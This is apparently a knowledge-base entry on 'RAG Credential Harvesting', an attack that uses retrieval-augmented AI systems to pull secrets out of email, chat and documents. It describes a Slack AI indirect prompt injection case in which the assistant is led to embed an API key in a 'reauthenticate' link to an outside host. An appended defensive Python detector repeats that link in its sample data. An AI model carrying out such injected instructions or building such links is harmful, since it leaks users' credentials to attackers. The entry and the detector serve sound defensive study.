RAG Credential Harvesting
Type: technique
Description: The adversary uses the AI system to query for secrets indexed by the RAG. Variants include searching through secrets in email, chat and shared documents.
Version: 0.1.0
Created At: 2024-10-11 16:54:32 +0300
Last Modified At: 2024-10-11 16:54:32 +0300
External References
Related Objects
- --> Credential Access (tactic): An adversary can harvest secrets from various systems through RAG queries.
- --> RAG Data Harvesting (technique): The two techniques are similar apart from their target data and purpose.
- <-- RAG Data Harvesting (technique): The two techniques are similar apart from their target data and purpose.
- <-- Data Exfiltration from Slack AI via indirect prompt injection (procedure): Once a user asks a question about "EldritchNexus API key", SlackAI has access to information in their private channels. The adversary gets SlackAI to embed any found secret in a clickable link parameter [click here to reauthenticate](https://aiexecutiveorder.com?secret=confetti).
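A defensive check for the link-parameter pattern in the Slack AI procedure above, as an added example that is not part of the original entry: it flags markdown links in an assistant response whose query-parameter values were copied verbatim from the retrieved RAG context. The function names, the allowlist parameter and the sample chunk and response are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Markdown inline link: [text](url)
MD_LINK = re.compile(r"\[([^\]]*)\]\((\S+?)\)")

def find_exfil_links(response, retrieved_chunks, allowed_hosts=(), min_len=6):
    """Return (url, param, value) for every markdown link in the response
    whose query value also appears in the retrieved context."""
    context = "\n".join(retrieved_chunks)
    findings = []
    for _text, url in MD_LINK.findall(response):
        parts = urlsplit(url)
        if parts.hostname in allowed_hosts:
            continue  # links to trusted hosts are not inspected
        # parse_qsl percent-decodes values, so URL-encoded copies still match
        for name, value in parse_qsl(parts.query):
            if len(value) >= min_len and value in context:
                findings.append((url, name, value))
    return findings

def sanitize(response, retrieved_chunks, allowed_hosts=()):
    """Replace flagged links with their visible text so nothing is clickable."""
    flagged = {u for u, _, _ in find_exfil_links(response, retrieved_chunks, allowed_hosts)}
    return MD_LINK.sub(
        lambda m: m.group(1) + " [link removed]" if m.group(2) in flagged else m.group(0),
        response,
    )

# Constructed sample data (hypothetical; mirrors the link shown in the entry)
CHUNKS = ["#private-dev: EldritchNexus API key: confetti"]
RESPONSE = ("Error loading message, "
            "[click here to reauthenticate](https://aiexecutiveorder.com?secret=confetti)")

if __name__ == "__main__":
    for url, name, value in find_exfil_links(RESPONSE, CHUNKS):
        print(f"blocked: {url} leaks retrieved value via '{name}'")
    print(sanitize(RESPONSE, CHUNKS))
```

The check only catches verbatim copies; a value that is encoded or split before being placed in the URL needs a stricter policy, such as rendering links only to allowlisted hosts.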